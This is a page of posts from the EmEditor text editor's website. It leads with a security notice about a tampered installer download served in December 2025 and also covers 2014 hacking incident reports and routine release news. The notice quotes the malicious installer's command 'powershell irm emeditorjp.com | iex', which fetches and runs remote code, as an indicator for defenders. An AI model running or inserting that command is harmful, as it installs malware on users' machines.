Posts

[Important] Security Incident Notice Regarding the EmEditor Installer Download Link

/in /by

We regret to inform you that we have identified an incident involving the EmEditor official website’s download path (the [Download Now] button), where unauthorized modification by a third party is suspected. During the affected period, the installer downloaded via that button may not have been the legitimate file provided by us (Emurasoft, Inc.).

We sincerely apologize for the concern and inconvenience this may cause. Please review the information below.

1. Potentially Affected Period

  • Dec 19, 2025 18:39 – Dec 22, 2025 12:50 (U.S. Pacific Time)

If you downloaded the installer from the [Download Now] button on the EmEditor homepage during this period, it is possible that a different file without our digital signature was downloaded. This is a conservative estimate, and in reality the affected period may have been narrower and limited to a specific timeframe.

2. Incident Summary (High-Level Cause)

The [Download Now] button normally points to the following URL:

  • https://support.emeditor.com/en/downloads/latest/installer/64

This URL uses a redirect. However, during the affected period, the redirect settings appear to have been altered by a third party, resulting in downloads being served from the following (incorrect) URL:

  • https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi

This file was not created by Emurasoft, Inc., and it has already been removed.

As a result, we have confirmed that the downloaded file may be digitally signed not by us, but by another organization named WALSHAM INVESTMENTS LIMITED.

Note: This issue may not be limited to the English page and may affect similar URLs for other languages as well (including Japanese).

3. File Confirmed as Potentially Affected

At this time, the only file confirmed to be involved is:

  • emed64_25.4.3.msi

Legitimate file (official)

  • File name: emed64_25.4.3.msi
  • Size: 80,376,832 bytes
  • Digital signature: Emurasoft, Inc.
  • SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

Suspicious file (possible tampering)

  • File name: emed64_25.4.3.msi
  • Size: 80,380,416 bytes
  • Digital signature: WALSHAM INVESTMENTS LIMITED

4. Not Affected

You are not affected if any of the following applies:

  • You updated via EmEditor’s Update Checker or through EmEditor’s automatic update
  • You downloaded directly from download.emeditor.info
    Example: https://download.emeditor.info/emed64_25.4.3.msi
  • You downloaded a file other than emed64_25.4.3.msi
  • You used the portable version
  • You used the store app version
  • You installed/updated using winget
  • You downloaded the file but did not run/execute it

5. How to Check and What to Do

If you may have downloaded the installer via [Download Now] during the affected period, please verify the digital signature and SHA-256 hash of the file emed64_25.4.3.msi.

5-1. How to check the Digital Signature (Windows)

  1. Right-click the file (emed64_25.4.3.msi) and select Properties.
  2. Open the Digital Signatures tab.
  3. Confirm that the signer is Emurasoft, Inc.
  • If it shows WALSHAM INVESTMENTS LIMITED, the file may be malicious.

If the “Digital Signatures” tab is not shown, the file may be unsigned or the signature may not be recognized. In that case, do not run the file; delete it and follow the guidance below.

5-2. How to check SHA-256 (Windows / PowerShell)

Open PowerShell and run:

Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256

Confirm the output SHA-256 matches:

  • Legitimate SHA-256:
    e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

If the signature or SHA-256 does not match (Recommended actions)

If the digital signature is not Emurasoft, Inc. (e.g., it is WALSHAM INVESTMENTS LIMITED) or the SHA-256 does not match, you may have obtained a tampered file (potentially containing malware).

  • Immediately disconnect the affected computer from the network (wired/wireless)
  • Run a full malware scan on the system
  • Depending on the situation, consider refreshing/rebuilding the environment including the OS
  • Consider the possibility of credential exposure and change passwords used/stored on that device (and enable MFA where possible)

If you are using EmEditor in an organization, we also recommend contacting your internal security team (e.g., CSIRT) and preserving relevant logs where possible.

6. Observed Behavior (As Currently Confirmed)

The suspicious installer may attempt to run the following command when executed. Do not run this command under any circumstances.

  • powershell.exe "irm emeditorjp.com | iex"

This command downloads and executes content from emeditorjp.com.
emeditorjp.com is not a domain managed by Emurasoft, Inc.

Please also note that the installer may still proceed to install EmEditor normally and install legitimate EmEditor program files, which could make the issue difficult to notice.

7. Current Status and Next Updates

We are continuing to investigate the facts and determine the full scope of impact. We will provide updates on this page and/or through our official channels as soon as more information becomes available.
We take this incident very seriously and will implement necessary measures to identify the cause and prevent recurrence.

We sincerely apologize again for the inconvenience and concern this may have caused, and we appreciate your understanding and continued support of EmEditor.

Interview article with an Internet Watch editor was published today!

/in /by

Internet Watch (Japanese): Commitment to “edit text”! Why is the de facto standard editor “EmEditor” different from other editors?

Interview article with a MyNavi News editor was published today!

/in /by

MyNavi News: Approaching the true value of EmEditor, a text editor that continues to be comfortable and fast – Interview with Yutaka Emura, President of Emurasoft, Inc. (Japanese)

The 64-bit portable version released. File hosting switched to the Amazon S3 cloud

/0 Comments/in /by

Today, we released EmEditor v14.8.0, and we also released the 64-bit version of the portable version, in addition to the installer and 32-bit portable versions today. All the installers of all the formats are available to download at the Download page.

Moreover, the file hosting was switched from the old web hosting server to the Amazon S3 cloud service. We hope this change will bring us faster and more stable downloads and updates.

We will continue improving our services. Please contact us if there are any issues with downloading or updating.

Thank you for using EmEditor!

Version 14.6 feature page was added

/0 Comments/in /by

Today, we added the EmEditor Version 14.6 feature page. This new version adds important features with big data and database files in mind: more CSV support, Filter Bar, more Search options including the Extract button. We are planning to release EmEditor Version 14.6 very soon.

Thank you for using EmEditor!

Investigation report about the hacking incident

/0 Comments/in /by

Yesterday, we received the final investigation report from JPCERT/Coordination Center.

How unauthorized hacking was happened

From the various remained access logs, we could not identify the cause for the unauthorized hacking. We confirmed suspicious accesses (web and ftp) from 203.194.144.#, and we confirmed traces of attack attempts in early August. However, we couldn’t identify how the hacker entered our site just by these traces. There were no successful logins from these IP addresses.

About unauthorized redirects

From the remained access logs, the following 2 accesses were considered unauthorized accesses redirected by the .htaccess that was placed by a hacker.

#.#.#.# - - [18/Aug/2014:05:41:38 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 884 "-" "AdvancedInstaller"
#.#.#.# - - [18/Aug/2014:06:19:04 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 884 "-" "AdvancedInstaller"

These accesses match with the IP addresses written in the .htaccess, the time frame when the incident happened. Also, the number of bytes written in the access log (884) was different from the number of bytes written in the other accesses in the other time frame and other IP addresses.

Usually access logs look like:

#.#.#.# - - [10/Aug/2014:03:45:09 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 855 "-" "AdvancedInstaller"

the number of bytes is 855 for this file, but the above two accesses show the number of bytes as 884 bytes.

The clients who own the above IP addresses were contacted by JPCERT/CC, and found there were no malware infections. The access logs record all accesses including merely update checking without actual installation.

Future measures

In addition to routine updates of WordPress plug-ins and themes, we periodically scan our site for malware, monitor files on the server, access logs, and block suspicious IP addresses. On August 29th, we protected the entire site of emeditor.com with SSL encrypted connections. We are also planning to move our forums to another site or an electronic mailing list for improved security.

The next version of Advanced Installer that we used to make the Update Checker will be able to block update installers without the same digital signature as ours. The future EmEditor versions will restore the Update Checker with improved security.

We apologize for any inconveniences that this situation might have caused you

See also:

Possible malware attack by EmEditor Update Checker

Possible malware attack by EmEditor Update Checker

/0 Comments/in /by

Dear EmEditor user,

We have found malicious files were placed in a subfolder of the EmEditor website, and we estimate these files were placed by a hacker between 6:36 am and 11:20 am on August 18th in the Pacific Daylight Time (USA and Canada), or between 1:36 pm and 6:20 pm on August 18th in the UTC. If a user uses EmEditor Update Checker from one of certain IP addresses, a malicious program, not EmEditor, might have been installed. The IP addresses are:

For the following list, * represents any number between 0 and 255. All 256 numbers between 0 and 255 are IP addresses in question.

12.44.85.*
12.189.27.*
12.233.153.*
42.147.69.*
49.101.250.*
61.211.224.*
63.119.133.*
64.102.249.*
64.235.145.*
64.235.151.*
66.129.241.*
77.248.69.*
86.111.221.*
106.139.26.*
106.188.131.*
114.160.192.*
118.103.17.*
118.238.0.*
124.248.207.*
133.6.1.*
133.6.91.*
133.6.94.*
133.56.0.*
133.74.211.*
133.173.2.*
150.26.82.*
173.36.196.*
173.38.209.*
182.162.60.*
188.111.86.*
194.98.194.*
198.135.0.*
199.167.55.*
203.104.128.*
203.180.164.*
204.15.64.*
209.97.118.*
210.17.188.*
210.172.128.*
210.174.36.*
210.224.179.*
216.228.150.*
219.195.174.*

For the following list, # represents a number between 0 and 255, but only one number represents the IP address in question. To protect users’ privacy, the actual IP address is hidden by #. If your IP address is included in this list, please contact us at [email protected] with your IP address, and we will let you know your IP address is included.

12.234.38.#
61.202.251.#
101.110.12.#
101.110.14.#
101.110.15.#
101.111.185.#
108.28.100.#
117.103.185.#
118.159.230.#
118.159.235.#
124.85.138.#
126.205.203.#
133.6.76.#
153.163.255.#
180.0.96.#
180.6.227.#
202.7.107.#
202.62.253.#
206.13.28.#
210.148.24.#
210.164.30.# (2 IP addresses)
210.169.198.#
210.175.75.#
210.233.113.#
210.237.143.#
211.7.234.#

If your IP address is included in any of the above lists, and if you use the Update Checker of EmEditor during the above time frame, there is a possibility that your computer might have been infected by a virus. If so, please use anti-virus software to clean your computer.

To check your IP address, please go to www.google.com, enter “My IP”.

Currently, our server hosting company is scanning the whole website. As soon as the scan is completed, we plan to resolve the issue completely by all means.

We will keep you informed of our progress. If we cannot get access to our website, we might use Twitter, Google+, or Facebook to make announcements.

We apologize for any inconveniences that this situation might have caused you.

 

Website scans were completed and all websites are clean

/0 Comments/in /by

Our website scans were completed, and all our websites were clean, including all of our foreign language EmEditor websites as well as Emurasoft Customer Center. This means this English website was not affected by this case.

Nevertheless, as a precaution, we recommend changing your password if you have an account in one of our sites, and please do not share the same password with Emurasoft Customer Center or any other websites.

To prevent future hacker attacks, we have tightened our security level. We no longer accept new members automatically. If you are not a member yet, and if you would like to join our forums, please contact us.

Once again, we apologize for any inconveniences.

Thank you for using EmEditor!

EmEditor foreign language websites attacked by hackers

/0 Comments/in /by

Dear EmEditor user,

On August 12th, 2014, we discovered traces of malicious code in our Japanese EmEditor home page and Simplified Chinese EmEditor home page. Because of this, we temporarily stopped our websites, and we have been checking and cleaning up the sites. In the Japanese site, there were traces where usernames, passwords, and IP addresses of users might have been compromised.

If you have an account in the Japanese site, it is strongly recommended that you change your password. To change the password, please go to the Forums page and log into your account. After signing in, you will see a menu bar showing at the top of the webpage. Go to the top right corner of the webpage that shows your username and in the drop-down menu click “Edit My Profile” .

Currently, there is no evidence that other language sites including this English site was compromised, and there is no evidence that Emurasoft Customer Center was compromised. However, as a precaution, we strongly recommend changing your password if you have an account in these sites. If you share the same password with other websites, we also recommend changing your passwords with those sites.

We apologize for any inconveniences that this situation might have caused you. We are still scanning other language home pages. We will keep you updated if there are any progresses. Thank you.

 

The forum conversion completed!

/0 Comments/in /by

We have completed the conversion from old forums to new website!

You can see our new forums here. You will see all old messages are converted to the new website.

If you already had an account with the old forums, your account was converted to the new website. However, your password was set to a random string. Please go to the Lost Password and change your password before you log in to the new website.

Thank you!